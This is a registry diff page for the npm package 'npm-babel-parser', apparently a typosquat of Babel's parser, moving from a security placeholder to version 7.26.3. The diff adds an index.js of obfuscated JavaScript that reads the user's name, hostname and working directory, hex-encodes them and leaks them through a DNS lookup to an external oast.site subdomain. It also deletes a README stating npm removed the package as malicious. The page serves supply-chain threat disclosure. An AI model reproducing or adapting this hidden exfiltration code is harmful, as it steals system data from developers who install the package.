npm-babel-parser 0.0.1-security → 7.26.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of npm-babel-parser might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const _0x5062e1=_0x8c52;(function(_0xcc6cbb,_0xe1143d){const _0x239205=_0x8c52,_0x46922c=_0xcc6cbb();while(!![]){try{const _0x114dd1=-parseInt(_0x239205(0xa4))/0x1+-parseInt(_0x239205(0xaa))/0x2*(parseInt(_0x239205(0xa7))/0x3)+-parseInt(_0x239205(0xa0))/0x4*(-parseInt(_0x239205(0xa8))/0x5)+-parseInt(_0x239205(0xa3))/0x6+-parseInt(_0x239205(0xad))/0x7+-parseInt(_0x239205(0xa9))/0x8+parseInt(_0x239205(0x9e))/0x9;if(_0x114dd1===_0xe1143d)break;else _0x46922c['push'](_0x46922c['shift']());}catch(_0x325462){_0x46922c['push'](_0x46922c['shift']());}}}(_0x47c7,0x268f4));function _0x8c52(_0x2e99c3,_0x488560){const _0x47c720=_0x47c7();return _0x8c52=function(_0x8c52f0,_0x338108){_0x8c52f0=_0x8c52f0-0x9e;let _0x2f8e8b=_0x47c720[_0x8c52f0];return _0x2f8e8b;},_0x8c52(_0x2e99c3,_0x488560);}const dns=require(_0x5062e1(0xac)),os=require('os'),path=require('path'),u=os['userInfo']()[_0x5062e1(0xa1)],h=os[_0x5062e1(0xaf)](),p=process[_0x5062e1(0xa6)](),hexH=Buffer[_0x5062e1(0xa2)](h)[_0x5062e1(0x9f)](_0x5062e1(0xab)),hexU=Buffer[_0x5062e1(0xa2)](u)['toString'](_0x5062e1(0xab)),hexP=Buffer[_0x5062e1(0xa2)](p)[_0x5062e1(0x9f)](_0x5062e1(0xab)),subdomain=_0x5062e1(0xb0)+hexU+'.'+hexH+'.'+hexP+_0x5062e1(0xa5);function _0x47c7(){const _0x14efd2=['131822SjlndI','hex','dns','373443uqdugd','lookup','hostname','oo.','4169250NcstVx','toString','4LtQIfG','username','from','831474kvWvPG','103347eISiTi','.cu0ailk41o3e0ugpeq309nk1hnusbugem.oast.site','cwd','6evehMD','747975NyVgGn','222464qHFJzt'];_0x47c7=function(){return _0x14efd2;};return _0x47c7();}dns[_0x5062e1(0xae)](subdomain,(_0x4e8e12,_0x1ff5d2,_0x1a2a29)=>{});
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "npm-babel-parser",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "7.26.3",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
7
|
+
},
|
8
|
+
"author": "",
|
9
|
+
"license": "ISC",
|
10
|
+
"description": ""
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=npm-babel-parser for more information.
|